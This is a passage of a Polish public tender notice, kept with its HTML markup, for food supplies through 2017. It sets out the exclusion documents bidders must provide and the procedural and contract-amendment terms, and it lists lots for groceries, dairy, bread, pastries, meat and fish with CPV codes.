           Oświadczenie (aktualne na dzień składania ofert), Wykonawca/y załącza/ją do  
           składanej  oferty.                                                                                                           
           Jeżeli w/w Wykonawca/y, powołuje/ją się na zasoby innych  podmiotów, w celu 
           wykazania spełnienia, w zakresie, w jakim powołuje/ją się na ich zasoby, warunków  
           udziału w postępowaniu, w/w Wykonawca/y :                                                                 
     a)   w oświadczeniu j.w, zamieszcza/ją informację o tych podmiotach.
          
     b)  składają dokument o którym mowa w pkt. 6.3.2 SIWZ.
         

7.Oświadczenia oraz dokumenty wymagane przez Zamawiającego w celu
           wykazania braku podstaw do wykluczenia z postępowania o udzielenia 
           zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust.1,  
           oraz w okolicznościach o których mowa w art. 24 ust.5 pkt. 1, ustawy Pzp :

 a)  oświadczenie Wykonawcy/ów o braku podstaw do wykluczenia z postępowania       
      w okolicznościach o których mowa w art. 24 ust.1,oraz art.24 ust.5 pkt.1, w zw. 
      z art.25 ustawy Pzp -
    - w/g  wzoru określonego w  Załączniku Nr 11 do SIWZ.
      Oświadczenie (aktualne na dzień składania ofert), Wykonawca/y załącza/ją do   
      składanej oferty.
           W sytuacji gdy :
         - w/w Wykonawca/y, powołuje/ją się na zasoby innych podmiotów, w celu 
           wykazania braku istnienia wobec nich podstaw wykluczenia, w zakresie, w jakim 
           powołuje/ją się na ich zasoby, w/w Wykonawca/y w oświadczeniu j.w. zamieszcza/ją
           informację o tych podmiotach.
         - w/w Wykonawca/y, zamierza/ją powierzyć wykonanie części zamówienia
           podwykonawcom, w celu wykazania braku istnienia wobec podwykonawców  
           podstaw wykluczenia z udziału w postępowaniu, w/w Wykonawca/y w oświadczeniu 
           j.w. zamieszcza/ją informację o tych podwykonawcach.

           Wymagana forma dokumentu  oryginał.

 b) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji 
      o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
      rejestru lub ewidencji, w celu potwierdzenia braku podstaw  wykluczenia  na   
      podstawie  art. 24 ust.5 pkt 1, w zw. z art.25 ustawy Pzp,
      Wskazany Wykonawca (którego oferta została najwyżej oceniona), składa na  
      wezwanie Zamawiającego w/w dokument (aktualny na dzień złożenia oświadczeń lub   
      dokumentów) , w terminie wyznaczonym przez Zamawiającego (nie  krótszym niż         
      5 dni od daty otrzymania wezwania), oraz (o ile dotyczy w/w Wykonawcy) :
  -    gdy wskazany w/w Wykonawca, polega na zdolnościach lub sytuacji innych  podmiotów na
       zasadach określonych w art. 22a ustawy Pzp, w/w dokument w/w Wykonawca składa również               
       w odniesieniu do podmiotu udostępniającego zasoby.
 -     gdy  wskazany w/w Wykonawca, zamierza powierzyć podwykonawcy wykonanie części
       przedmiotu zamówienia, a który to podwykonawca nie jest podmiotem na którego zdolnościach  
        lub sytuacji w/w Wykonawca polega na zasadach określonych w art. 22a ustawy Pzp, w/w 
       dokument w/w Wykonawca składa również w odniesieniu do podwykonawcy.
             Wymagana forma dokumentu - oryginał lub kopia poświadczona za zgodność  
             z oryginałem przez Wykonawcę.

8.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
           Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 7.2.SIWZ 
           składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub   
           miejsce  zamieszkania, potwierdzające odpowiednio, że :
-     nie otwarto jego likwidacji ani nie ogłoszono upadłości-wystawiony nie wcześniej niż
      6 miesięcy przed upływem terminu składania ofert,

Jeżeli w  kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub w
           kraju, w którym miejsce zamieszkania mają osoby,których dotyczą dokumenty ,
           nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je    
           dokumentem zawierającym oświadczenie Wykonawcy, ze wskazaniem osób   
           uprawnionych do reprezentacji Wykonawcy, złożone przed właściwym organem  
           sądowym, administracyjnym albo organem samorządu zawodowego lub  
           gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym 
           wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Termin  
           wystawienia dokumentów j.w..     </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.   Istotne dla stron postanowienia umowy które zostaną wprowadzone do treści
         zawieranej umowy w sprawie zamówienia publicznego.

 1.1 Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na
         podstawie której dokonano wyboru Wykonawcy, chyba że zachodzi co najmniej jedna z 
         następujących okoliczności:
     a) zmiany zostały przewidziane w ogłoszeniu o zamówieniu lub SIWZ w postaci 
         jednoznacznych postanowień umownych,które określają ich zakres, w szczególności 
         możliwość zmiany wysokości wynagrodzenia Wykonawcy, i charakter oraz warunki 
         wprowadzenia zmian. 
         Uwaga:
         Maksymalne ilości artykułów (asortymentów) przedmiotu zamówienia,  
         Zamawiający określił (działając z należytą starannością) w formularzach cenowych 
         (Zał. Nr.2  9 do SIWZ). Zamawiający  zastrzega sobie prawo do dostosowania tych 
         ilości do swoich potrzeb (z uwzględnieniem konsekwencji rachunkowych w 
         wynagrodzeniu umownym   do max. jego wartości wynikającej  z  umowy).
     b) zostały spełnione łącznie następujące warunki:
      -  konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający,
         działając z należytą starannością, nie mógł przewidzieć,
      -  wartość zmiany nie przekracza 50 % wartości zamówienia określonej pierwotnie
         w umowie.
     c) Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy
         Wykonawca:
     -   na  podstawie postanowień umownych, o których mowa w pkt. 1.1 ppkt. a,
     -   w wyniku połączenia, podziału, przekształcenia, upadłości,restrukturyzacji lub nabycia
         dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca  
         spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy  
         wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy,
     d) w wyniku przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jego
         podwykonawców,
2.  W wyniku niniejszego postępowania zostanie zawarta umowa, której treść zawarto we
           wzorze umowy stanowiącym  Załącznik Nr 13 do SIWZ.
3.  Zamawiający przewiduje zmianę postanowień zawartej umowy z przyczyn  o których
         mowa w pkt. 1.1 ppkt. a-d  oraz zmiany z przyczyn o których mowa    
         w pkt. 3,  które będą mogły  być wprowadzone w formie aneksu do 
         umowy. Przyczyny zmian, określone w pkt. 3, dotyczą :
    a) Wszystkie wartości netto i ceny netto za jednostkę określone przez Wykonawcę, są
         ustalone na okres ważności umowy i nie wzrosną.  Dopuszcza się zmianę
         umowy w formie aneksu w przypadku, gdy wartości netto i ceny netto za jednostkę
         określone przez Wykonawcę obniżą się, przy czym konsekwencje rachunkowe
         stosuje się odpowiednio.
     b) Urzędowa zmiana stawek podatku VAT obowiązuje z mocy prawa. 
         Dopuszcza się zmianę zapisów umowy w formie aneksu w przypadku zmiany stawki
         podatku VAT, oraz zmiany przepisów prawa podatkowego.
     c) W przypadku zaprzestania produkcji danego artykułu (asortymentu) , lub zmiany jego
         gramatury, Zamawiający dopuszcza dostawy artykułu  (asortymentu)  zastępczego,  
         spełniającego wymogi SIWZ. Cena asortymentu (towaru) zastępczego  nie może być 
         wyższa niż cena oferowana w umowie.
    d) Zamawiający dopuszcza zmiany producenta dostarczanego artykułu ( asortymentu) ,
          pod warunkiem, że artykuł (asortyment) będzie takiej  samej lub lepszej jakości, oraz    
          w   tej samej cenie, a Wykonawca uzasadni konieczność dokonania takiej zmiany.
     e) Zmiany polegające na zmianie nr telefonu, nr faxu, adresu e-mail, niezbędne dla
          realizacji zamówienia oraz na które składane są przez Zamawiającego, zamówienia
          i reklamacje,<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>zadanie Nr 1 <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zadanie Nr 1  dostawy artykułów spożywczych zgodnie z formularzem cenowym
      stanowiącym  Zał. Nr 2 do SIWZ.
Dostawy dotyczą artykułów :
  -   produkty przemiału ziarna (CPV 15610000-7) : kasze, płatki, ryż, mąka pszenna.
  -   skrobia i produkty skrobiowe (CPV 15620000-0) : mąka ziemniaczana.
  -  olej roślinny (CPV 154 11100-3) : olej jadalny uniwersalny.
  -  oliwa z oliwek (CPV 15411110-6) : oliwa z oliwek.
  -  pasztet (CPV 15131310-1) : pasztet drobiowy.
  -  owoce, warzywa i podobne produkty (CPV 15300000-1) : dżemy, powidła, warzywa 
     przetworzone, soki, owoce suszone (śliwki), groch łuskany (połówki), fasola Jaś.
  -  cukier i produkty pokrewne (CPV 15830000-5) : cukier biały, cukier waniliowy, cukier
     puder, miód, syrop cukrowy.
  -  makaron niegotowany (CPV 15851100-9) : makarony.
  -  kawa, herbata i podobne produkty (CPV 15860000-4) : kawa zbożowa, herbata.
  -  przyprawy i przyprawy korzenne (CPV 15870000-7) : sól, cynamon, czosnek
     granulowany, gałka muszkatałowa, zioła prowansalskie (mieszanka), przyprawa 
     warzywna  do potraw, przyprawa do zup i sosów w płynie, kwasek cytrynowy,  ocet, 
     ketchup,majonez, musztarda, pieprz czarny, przyprawy ziołowe.
  -  produkty dietetyczne (CPV 15882000-4) : chrupki kukurydziane bezglutenowe
     (naturalne i smakowe), kaszki ryżowo-owocowe (bezmleczne), kaszki mleczno-ryżowe           
     z owocami, kaszka mleczno-wielozbożowa wieloowocowa, produkty niskobiałkowe PKU.
  -  różne produkty spożywcze i produkty suszone (CPV 15890000-3) : drożdże,
     proszek do pieczenia, aromaty, bułka tarta, barszcz biały, przyprawa do zup, kostki
     rosołowe, grzyby suszone, kisiel, budyń, galaretki.
  -  kakao, czekolada i wyroby cukiernicze (CPV 15840000-8) : kakao, biszkopty, 
     ciastka kruche, paluszki słone (smakowe), cukierki, czekolada, herbatniki  w czekoladzie.
  -  owoce tropikalne (CPV 03222110 -7) : banany, kiwi.
  -  owoce cytrusowe (CPV 03222200  5) : cytryny, mandarynki.
  -  owoce pestkowe (CPV 03222330  5) : nektarynki, arbuzy, winogrona.

     Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 2 (formularzu
     cenowym zadania Nr 1).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15610000-7,
                    15620000-0,
                    15411100-3,
                    15411110-6,
                    15131310-1,
                    15300000-1,
                    15830000-5,
                    15851100-9,
                    15860000-4,
                    15870000-7,
                    15882000-4,
                    15890000-3,
                    15840000-8,
                    03222110-7,
                    03222200-5,
                    03222330-5,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>zadanie Nr2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zadanie Nr 2  dostawy artykułów mleczarskich zgodnie z formularzem cenowym
     stanowiącym  Zał. Nr 3 do SIWZ. Dostawy dotyczą artykułów :
  -  śmietana  (CPV 15512000-0) : śmietany 18%,
  -  mleko w proszku (CPV 15511700-0) : mleko w proszku,
  -  masło (CPV 15530000-2) : masła świeżego,
  -  margaryna  (CPV 15431100-9) : margaryny do smarowania, mixu tłuszczowego,
  -  jogurt bez dodatków substancji smakowych  (CPV 15551310-1) : jogurtów
     naturalnych,
  -  jogurt z dodatkiem substancji smakowych (CPV 15551320-4) : jogurtów owocowych,
     deserów,
  -  klasyfikowane produkty mleczarskie (CPV  15550000-8) : kefiru,
  -  maślanka  (CPV  15551500-0) : maślanki,
  -  pasty serowe do smarowania  (CPV 15545000-0) : serków homogenizowanych
     waniliowych, serka wiejskiego i serów topionych,
  -  ser  twardy (CPV 15544000-3) : sera twardego gouda i edamskiego,
  -  ser twarogowy  (CPV 15542100-0) : twarogu półtłustego.  
                                                                        
     Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 3 (formularzu 
     cenowym zadania Nr 2).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15512000-0,
                    15511700-0,
                    15530000-2,
                    15431100-9,
                    15551310-1,
                    15551320-4,
                    15550000-8,
                    15551500-0,
                    15545000-0,
                    15544000-3,
                    15542100-0,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zadanie Nr 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zadanie Nr 3  dostawy pieczywa zgodnie z formularzem cenowym stanowiącym  
     Zał. Nr 4 do SIWZ.  Dostawy dotyczą  artykułów :
  -  chleb  (CPV 15811100-7) : chleba zwykłego, chleba graham, chleba słonecznikowego,  
  -  bułeczki (CPV 15811400-0) : bułeczki pszenne, bułeczki graham.     
 
     Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 4 (formularzu
     cenowym zadania Nr 3).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15811100-7,
                    15811400-0,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Zadanie Nr 4<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zadanie Nr 4  dostawy artykułów ciastkarskich i ciast  zgodnie z formularzem  
    cenowym
    stanowiącym  Zał. Nr 5 do SIWZ. Dostawy dotyczą artykułów :
  - wyroby ciastkarskie  (CPV 15812100-4) :  pączków,
  - ciasta (CPV 15812200-5) : ciast drożdżowych z makiem, ciast drożdżowych z serem, 
    strucli makowej, babki piaskowej, piernika z powidłami.

    Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 5 (formularzu
    cenowym zadania Nr 4).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15812100-4,
                    15812200-5,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Zadanie Nr 5<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zadanie Nr 5  dostawy mięsa i wędlin zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 6 do SIWZ. Dostawy dotyczą artykułów :
  - drób (CPV 15112000-6) : kurczaka świeżego, filetów świeżych z kurczaka, korpusów
    mrożonych z kurczaka, udek świeżych z kurczaka,świeżego mięsa gulaszowego 
    z kurczaka
  - podroby  (CPV 15114000-0) : świeżych wątróbek i żołądków z kurczaka,
  - wieprzowina (CPV 15113000-3) : świeżej słoniny, świeżej łopatki wieprzowej bez kości, 
    świeżego schabu bez kości, świeżej karkówki bez kości ,
  - mięso wołowe  (CPV 15111000-9) :  świeżej łopatki  wołowej bez kości,
  - wędliny drobiowe (CPV 15131135-0) : pasztetu drobiowego, parówki drobiowej 
    (cienkiej), batonu drobiowego, polędwicy drobiowej, baleronu z indyka,
  - produkty wieprzowe (CPV 15131400-9) : kiełbasy : krakowskiej, szynkowej,
    toruńskiej, wiejskiej, zwyczajnej, pieczeni rzymskiej, pieczeni tyrolskiej, szynki wiejskiej, 
    kaszani, kiszki pasztetowej, salcesonu wiejskiego, boczku wędzonego.

    Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 6 (formularzu
    cenowym zadania Nr 5).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15112000-6,
                    15114000-0,
                    15113000-3,
                    15111000-9,
                    15131135-0,
                    15131400-9,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Zadanie Nr6<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zadanie Nr 6  dostawy artykułów rybnych zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 7 do SIWZ. Dostawy dotyczą artykułów :
  - ryby przetworzone i konserwowane  (CPV 15200000-0) : filetów, płatów mrożonych 
    z : morszczuka, mintaja,  makreli wędzonej, śledzi solonych Matjas (filety), śledzi w oleju
    (filety), konserw rybnych : paprykarz szczeciński, śledź w pomidorach, filet z makreli 
    w oleju, filet z makreli w pomidorach.

    Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 7 (formularzu
    cenowym zadania Nr 6).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15200000-0,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
